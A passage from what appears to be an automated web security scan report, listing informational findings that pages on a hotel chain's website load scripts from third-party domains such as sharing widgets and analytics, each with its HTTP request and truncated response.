Content-Length: 51360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme"></script>
...[SNIP]...

18.677. http://www.millenniumhotels.com/ae/grandmillenniumdubai/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/grandmillenniumdubai/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme

Request

GET /ae/grandmillenniumdubai/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:55:13 GMT
ETag: "1cc58-c7b5-7bc5783e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme"></script>
...[SNIP]...

18.678. http://www.millenniumhotels.com/ae/kingsgateabudhabi/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/kingsgateabudhabi/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /ae/kingsgateabudhabi/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:48:14 GMT
ETag: "8319-c652-ffe491c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 50770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.679. http://www.millenniumhotels.com/ae/millenniumabudhabi/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/millenniumabudhabi/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /ae/millenniumabudhabi/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:54:24 GMT
ETag: "22448-ca4b-78de51a9"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.680. http://www.millenniumhotels.com/ae/millenniumdubai/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/ae/millenniumdubai/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme

Request

GET /ae/millenniumdubai/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:54:02 GMT
ETag: "206cd-caae-7791f6a7"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilme"></script>
...[SNIP]...

18.681. http://www.millenniumhotels.com/cn/copthorneqingdao/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/copthorneqingdao/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://v1.jiathis.com/code/jia.js?uid=96395
http://www.google-analytics.com/urchin.js

Request

GET /cn/copthorneqingdao/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:15:14 GMT
ETag: "33527-e3ef-471d1fee"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58351

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</div>
   <script type="text/javascript" src="http://v1.jiathis.com/code/jia.js?uid=96395" charset="utf-8"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.682. http://www.millenniumhotels.com/cn/grandmillenniumbeijing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/grandmillenniumbeijing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://v1.jiathis.com/code/jia.js?uid=96395
http://www.google-analytics.com/urchin.js

Request

GET /cn/grandmillenniumbeijing/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:15:09 GMT
ETag: "29528-e4f9-46c9338e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58617

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</div>
   <script type="text/javascript" src="http://v1.jiathis.com/code/jia.js?uid=96395" charset="utf-8"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.683. http://www.millenniumhotels.com/cn/millenniumchengdu/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/millenniumchengdu/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://v1.jiathis.com/code/jia.js?uid=96395
http://www.google-analytics.com/urchin.js

Request

GET /cn/millenniumchengdu/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:14:13 GMT
ETag: "2a8d9-e46f-43770030"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58479

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</div>
   <script type="text/javascript" src="http://v1.jiathis.com/code/jia.js?uid=96395" charset="utf-8"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.684. http://www.millenniumhotels.com/cn/millenniumshanghai/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/millenniumshanghai/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://v1.jiathis.com/code/jia.js?uid=96395
http://www.google-analytics.com/urchin.js

Request

GET /cn/millenniumshanghai/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:14:11 GMT
ETag: "2a9ca-e763-962f8871"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59235

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</div>
   <script type="text/javascript" src="http://v1.jiathis.com/code/jia.js?uid=96395" charset="utf-8"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.685. http://www.millenniumhotels.com/cn/millenniumwuxi/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/millenniumwuxi/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://v1.jiathis.com/code/jia.js?uid=96395
http://www.google-analytics.com/urchin.js

Request

GET /cn/millenniumwuxi/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:57 GMT
ETag: "2faf1-e582-95570c85"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58754

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</div>
   <script type="text/javascript" src="http://v1.jiathis.com/code/jia.js?uid=96395" charset="utf-8"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.686. http://www.millenniumhotels.com/cn/millenniumxiamen/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/cn/millenniumxiamen/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
http://v1.jiathis.com/code/jia.js?uid=96395
http://www.google-analytics.com/urchin.js

Request

GET /cn/millenniumxiamen/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:13:49 GMT
ETag: "2fb12-e808-420ba69c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59400

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</div>
   <script type="text/javascript" src="http://v1.jiathis.com/code/jia.js?uid=96395" charset="utf-8"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.687. http://www.millenniumhotels.com/corporate/contact_us/enquiriesReservation.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/contact_us/enquiriesReservation.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/contact_us/enquiriesReservation.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:44 GMT
ETag: "2acdc-eacc-94998192"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.688. http://www.millenniumhotels.com/corporate/faq/faq.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/faq/faq.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/faq/faq.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:44 GMT
ETag: "2fb58-eb4c-94971f38"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.689. http://www.millenniumhotels.com/corporate/hotels/copthorneHotels.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/hotels/copthorneHotels.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/hotels/copthorneHotels.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:44 GMT
ETag: "2fb5b-f766-9494f9e7"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.690. http://www.millenniumhotels.com/corporate/hotels/hotelsMillennium.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/hotels/hotelsMillennium.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/hotels/hotelsMillennium.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:44 GMT
ETag: "2fb5d-fe16-9493119f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.691. http://www.millenniumhotels.com/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:44 GMT
ETag: "2fb5f-fca5-9490af45"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.692. http://www.millenniumhotels.com/corporate/investor_relations/financialLibrary.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/investor_relations/financialLibrary.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/investor_relations/financialLibrary.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:39 GMT
ETag: "2fb72-101ae-944f98ac"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.693. http://www.millenniumhotels.com/corporate/legalInfo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/legalInfo.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/legalInfo.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:37 GMT
ETag: "2fb79-ecdd-9428f8fa"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.694. http://www.millenniumhotels.com/corporate/privacyPolicy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/privacyPolicy.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/privacyPolicy.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:32 GMT
ETag: "2cd8b-113e7-93e35ab6"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.695. http://www.millenniumhotels.com/corporate/siteMap.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/siteMap.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/siteMap.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:32 GMT
ETag: "32d46-13fa1-93e04141"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.696. http://www.millenniumhotels.com/corporate/termsConditions.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/corporate/termsConditions.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /corporate/termsConditions.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:32 GMT
ETag: "32406-1122d-93e0f85c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:01:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.697. http://www.millenniumhotels.com/de/copthornehannover/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/de/copthornehannover/index.html

Issue detail

